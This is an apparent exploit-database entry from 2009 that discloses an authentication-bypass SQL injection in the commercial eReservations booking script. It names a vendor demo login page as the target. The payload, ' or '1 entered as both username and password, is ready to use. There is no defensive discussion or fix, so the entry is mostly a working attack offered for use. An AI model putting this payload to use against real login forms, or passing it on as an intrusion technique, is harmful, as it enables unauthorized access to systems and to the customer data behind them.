id: 4686
date: 01/16/2009
title: eReservations (Auth Bypass) SQL Injection Vulnerability
author: ByALBAYX
cves: 

=======================================================
eReservations (Auth Bypass) SQL Injection Vulnerability
=======================================================


#############################################
[~]Author   : ByALBAYX
#############################################
[~]eReservations (Auth Bypass)

[~]Script        : eReservations

[~]Price         : $249.95  save $50.00   :) 

[~]Demo          : http://reservations.enthrallweb.us/Login.asp

[~]Details       : http://enthrallweb.com/detail.asp?productID=16
#############################################
[~]username  : ' or '1

[~]password  : ' or '1
#############################################



#  0day.today [2023-03-21]  #